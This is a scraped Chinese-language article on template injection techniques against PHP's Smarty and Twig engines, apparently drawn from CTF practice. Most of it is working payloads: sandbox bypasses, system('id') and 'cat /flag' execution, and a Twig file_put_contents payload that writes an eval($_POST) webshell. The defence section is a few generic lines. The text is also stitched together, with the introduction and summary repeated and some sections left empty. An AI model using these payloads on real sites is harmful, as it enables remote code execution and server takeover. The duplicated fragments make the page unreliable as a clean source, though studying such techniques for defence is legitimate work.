PHP高版本模板注入技巧详解<\/h1>

背景介绍<\/h2>
PHP常见的模板引擎主要有两种：Twig和Smarty。随着版本升级，安全策略增强以及黑名单机制的实施，传统的RCE方法变得难以利用。本文将详细分析高版本下的模板注入技巧。<\/p>

Smarty模板注入<\/h2>

低版本利用手法<\/h3>

CISCN2019 Web11案例<\/strong>：<\/p>

通过X-Forwarded-For<\/code>头插入payload实现RCE<\/li>
示例payload：{if system('cat \/flag')}{\/if}<\/code><\/li> <\/ul> <\/li>
3.1以下版本特有方法<\/strong>：<\/p> 使用{php}<\/code>标签直接调用函数：{php}phpinfo();{\/php}<\/code><\/li> 3.1+版本已禁用此标签，仅在SmartyBC中可用<\/li> <\/ul> <\/li> {literal}标签利用<\/strong>：<\/p> 配合PHP5的特殊标签：<script language="php">phpinfo();<\/script><\/code><\/li> <\/ul> <\/li> 3.1.30之前版本文件读写<\/strong>：<\/p> 利用getStreamVariable<\/code>方法：<\/li> <\/ul> public<\/span> function<\/span> getStreamVariable<\/span>($variable) { <\/span><\/span> $_result =<\/span> ''<\/span>; <\/span><\/span> $fp =<\/span> fopen<\/span>($variable, 'r+'<\/span>); <\/span><\/span> if<\/span> ($fp) { <\/span><\/span> while<\/span> (!<\/span>feof<\/span>($fp) &&<\/span> ($current_line =<\/span> fgets<\/span>($fp)) !==<\/span> false<\/span>) { <\/span><\/span> $_result .=<\/span> $current_line; <\/span><\/span> } <\/span><\/span> fclose<\/span>($fp); <\/span><\/span> return<\/span> $_result; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <3.31版本命令执行<\/strong>：<\/p> 通过注释闭合实现文件包含：*\/phpinfo();\/*<\/code><\/li> 相关漏洞：CVE-2017-1000480<\/li> <\/ul> <\/li> <\/ol> 高版本利用方法<\/h3> 基本沙盒绕过<\/strong>：<\/p> ?<\/span>poc<\/span>=<\/span>string<\/span>:<\/span>{$s=<\/span>$smarty.<\/span>template_object<\/span>-><\/span>smarty<\/span>} <\/span><\/span>{$fp=<\/span>$smarty.<\/span>template_object<\/span>-><\/span>compiled<\/span>-><\/span>filepath<\/span>} <\/span><\/span>{Smarty_Internal_Runtime_WriteFile<\/span>::<\/span>writeFile<\/span>($fp,"<?php phpinfo();"<\/span>,$s)} <\/span><\/span><\/code><\/pre><\/li> 禁用安全模式<\/strong>：<\/p> ?<\/span>poc<\/span>=<\/span>string<\/span>:<\/span>{$smarty.<\/span>template_object<\/span>-><\/span>smarty<\/span>-><\/span>disableSecurity<\/span>()-><\/span>display<\/span>('string:{system(\'id\')}'<\/span>)} <\/span><\/span><\/code><\/pre><\/li> 函数定义绕过<\/strong>：<\/p> ?<\/span>poc<\/span>=<\/span>string<\/span>:<\/span>{function<\/span>+<\/span>name<\/span>=<\/span>'rce(){};system("id");function+'<\/span>}{\/<\/span>function<\/span>} <\/span><\/span><\/code><\/pre> 注意：某些黑名单可能检查"function"关键字，可尝试大写绕过<\/li> <\/ul> <\/li> 严格沙盒模式下的绕过<\/strong>：<\/p> 当display函数被禁用时，可使用fetch函数实现相同效果<\/li> <\/ul> <\/li> <\/ol> Twig模板注入<\/h2> 低版本利用手法<\/h3> 1.x版本<\/strong>：利用_self<\/code>变量调用Twig_Enviroment<\/code>的getfilter<\/code>方法<\/li> 底层通过call_user_func<\/code>实现RCE<\/li> <\/ul> <\/li> <\/ol> 高版本利用方法(2.x\/3.x)<\/h3> 过滤器利用<\/strong>：<\/p> {{<\/span>"<?php phpinfo(); eval($_POST[1])":"\/var\/www\/html\/1.php"<\/span>}|<\/span>map<\/span>(<\/span>"file_put_contents"<\/span>)<\/span>}}<\/span> <\/span><\/span>{{<\/span>[<\/span>"id"<\/span>,<\/span>0<\/span>]|<\/span>sort<\/span>(<\/span>"system"<\/span>)<\/span>}}<\/span> <\/span><\/span>{{<\/span>[<\/span>"id"<\/span>]|<\/span>filter<\/span>(<\/span>"system"<\/span>)<\/span>}}<\/span> <\/span><\/span>{{<\/span>[<\/span>0<\/span>,<\/span>0<\/span>]|<\/span>reduce<\/span>(<\/span>"system"<\/span>,<\/span>"id"<\/span>)<\/span>}}<\/span> <\/span><\/span><\/code><\/pre> 利用了map<\/code>、sort<\/code>、filter<\/code>、reduce<\/code>四种构造器<\/li> 底层原理：调用array_filter<\/code>、array_reduce<\/code>、array_map<\/code>等函数<\/li> <\/ul> <\/li> 创新payload示例<\/strong>：<\/p> {{<\/span>[<\/span>"galf\/"<\/span>,<\/span>" tac"<\/span>]|<\/span>join<\/span>|<\/span>reverse<\/span>|<\/span>split<\/span>(<\/span>""<\/span>)|<\/span>filter<\/span>(<\/span>"system"<\/span>)<\/span>}}<\/span> <\/span><\/span><\/code><\/pre> 通过join<\/code>拼接字符串，reverse<\/code>反转，split<\/code>分割为数组<\/li> 最终通过filter<\/code>执行系统命令<\/li> <\/ul> <\/li> <\/ol> 防御措施<\/h2> Smarty防御<\/strong>：<\/p> 使用最新版本<\/li> 配置严格的安全策略<\/li> 禁用危险函数和方法<\/li> <\/ul> <\/li> Twig防御<\/strong>：<\/p> 限制过滤器使用<\/li> 禁用危险函数<\/li> 对用户输入进行严格过滤<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 高版本模板注入虽然难度增加，但通过深入理解模板引擎的工作原理和安全机制，仍然可以找到有效的利用方法。安全人员应关注这些技巧，以便更好地防御此类攻击。<\/p>

PHP高版本模板注入技巧详解<\/h1>

背景介绍<\/h2> PHP常见的模板引擎主要有两种：Twig和Smarty。随着版本升级，安全策略增强以及黑名单机制的实施，传统的RCE方法变得难以利用。本文将详细分析高版本下的模板注入技巧。<\/p>

Smarty模板注入<\/h2>

Twig模板注入<\/h2>

总结<\/h2> 高版本模板注入虽然难度增加，但通过深入理解模板引擎的工作原理和安全机制，仍然可以找到有效的利用方法。安全人员应关注这些技巧，以便更好地防御此类攻击。<\/p>

背景介绍<\/h2>
PHP常见的模板引擎主要有两种：Twig和Smarty。随着版本升级，安全策略增强以及黑名单机制的实施，传统的RCE方法变得难以利用。本文将详细分析高版本下的模板注入技巧。<\/p>

总结<\/h2>
高版本模板注入虽然难度增加，但通过深入理解模板引擎的工作原理和安全机制，仍然可以找到有效的利用方法。安全人员应关注这些技巧，以便更好地防御此类攻击。<\/p>